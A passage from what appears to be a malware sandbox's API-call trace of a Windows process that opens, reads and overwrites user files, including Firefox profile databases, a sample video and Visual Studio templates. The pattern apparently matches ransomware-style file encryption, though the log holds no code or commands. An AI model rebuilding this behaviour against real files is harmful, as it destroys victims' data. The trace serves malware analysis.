(lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0180.139] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0180.139] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x940000 [0180.139] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0180.139] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.139] ReleaseMutex (hMutex=0x168) returned 1 [0180.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win7_scenic-demoshort_raw.wtv", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0180.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win7_scenic-demoshort_raw.wtv", cchWideChar=29, lpMultiByteStr=0x1f8fc6c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win7_scenic-demoshort_raw.wtv", lpUsedDefaultChar=0x0) returned 29 [0180.140] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.539] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.564] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.572] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.598] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.736] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.759] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.760] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.778] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eef0000 [0180.793] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0180.845] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x93e000 [0180.845] ReadFile (in: hFile=0x204, lpBuffer=0x2665868, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x345f278*=0x2000, lpOverlapped=0x0) returned 1 [0180.862] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x93e000 [0180.874] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee60000 [0180.889] VirtualFree (lpAddress=0x7eef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.894] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x2588, lpOverlapped=0x0) returned 1 [0180.896] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0180.897] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.897] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.897] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.898] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.898] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.899] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.899] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.899] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.900] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0180.900] VirtualFree (lpAddress=0x7ee60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.904] CloseHandle (hObject=0x204) returned 1 [0180.905] GetCurrentThreadId () returned 0x95c [0180.905] GetCurrentThreadId () returned 0x95c [0180.905] GetCurrentThreadId () returned 0x95c [0180.905] SetEvent (hEvent=0xc4) returned 1 [0180.905] RtlExitUserThread (Status=0x0) Thread: id = 21 os_tid = 0x96c [0062.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.614] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.614] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x38000 [0062.614] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.614] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.614] ReleaseMutex (hMutex=0x168) returned 1 [0062.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content-prefs.sqlite", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content-prefs.sqlite", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="content-prefs.sqlite", lpUsedDefaultChar=0x0) returned 20 [0062.615] ReadFile (in: hFile=0x1d4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0062.618] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x37000 [0062.618] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.619] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x37000 [0062.619] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.620] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0062.620] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.620] CloseHandle (hObject=0x1d4) returned 1 [0062.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.630] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.631] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x18000 [0062.631] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.631] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.631] ReleaseMutex (hMutex=0x168) returned 1 [0062.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webappsstore.sqlite", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0062.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webappsstore.sqlite", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webappsstore.sqlite", lpUsedDefaultChar=0x0) returned 19 [0062.631] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.634] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x17000 [0062.634] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.856] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x17000 [0062.857] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eb5b18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1eb5b18*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.857] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0062.857] WriteFile (in: hFile=0x1d4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.857] CloseHandle (hObject=0x1d4) returned 1 [0062.859] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.860] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.860] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2bd [0062.860] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.860] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.860] ReleaseMutex (hMutex=0x168) returned 1 [0062.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Class.zip", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Class.zip", cchWideChar=9, lpMultiByteStr=0x1f734ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class.zip", lpUsedDefaultChar=0x0) returned 9 [0062.860] ReadFile (in: hFile=0x1d4, lpBuffer=0x2662a28, nNumberOfBytesToRead=0x2bd, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesRead=0x359f2bc*=0x2bd, lpOverlapped=0x0) returned 1 [0062.861] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0062.861] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eab9a8*, nNumberOfBytesToWrite=0x845, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eab9a8*, lpNumberOfBytesWritten=0x359f2d0*=0x845, lpOverlapped=0x0) returned 1 [0062.862] CloseHandle (hObject=0x1d4) returned 1 [0062.862] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.863] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.863] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x85a [0062.863] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.863] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.863] ReleaseMutex (hMutex=0x168) returned 1 [0062.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ResourceInternal.zip", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ResourceInternal.zip", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResourceInternal.zip", lpUsedDefaultChar=0x0) returned 20 [0062.863] ReadFile (in: hFile=0x1d4, lpBuffer=0x1eab9a8, nNumberOfBytesToRead=0x85a, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eab9a8*, lpNumberOfBytesRead=0x359f2bc*=0x85a, lpOverlapped=0x0) returned 1 [0062.904] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0062.904] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0xde2, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f2d0*=0xde2, lpOverlapped=0x0) returned 1 [0062.904] CloseHandle (hObject=0x1d4) returned 1 [0062.909] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.909] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.910] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x485 [0062.910] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0062.910] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.910] ReleaseMutex (hMutex=0x168) returned 1 [0062.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AssemblyInfoInternal.zip", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0062.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AssemblyInfoInternal.zip", cchWideChar=24, lpMultiByteStr=0x1f8fd8c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AssemblyInfoInternal.zip", lpUsedDefaultChar=0x0) returned 24 [0062.910] ReadFile (in: hFile=0x1d4, lpBuffer=0x2698438, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2698438*, lpNumberOfBytesRead=0x359f2bc*=0x485, lpOverlapped=0x0) returned 1 [0063.887] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0063.888] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0xa0d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x359f2d0*=0xa0d, lpOverlapped=0x0) returned 1 [0063.888] CloseHandle (hObject=0x1d4) returned 1 [0063.889] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0063.890] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0063.890] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x36b7 [0063.890] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0063.890] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.890] ReleaseMutex (hMutex=0x168) returned 1 [0063.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MDIParent.zip", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0063.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MDIParent.zip", cchWideChar=13, lpMultiByteStr=0x1f732ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MDIParent.zip", lpUsedDefaultChar=0x0) returned 13 [0063.890] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0063.935] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x26b7 [0063.935] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0063.936] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x26b7 [0063.936] WriteFile (in: hFile=0x1d4, lpBuffer=0x269c448*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x269c448*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0063.936] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0063.936] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0063.936] CloseHandle (hObject=0x1d4) returned 1 [0063.959] CreateFileW (lpFileName="C:\\Program Files 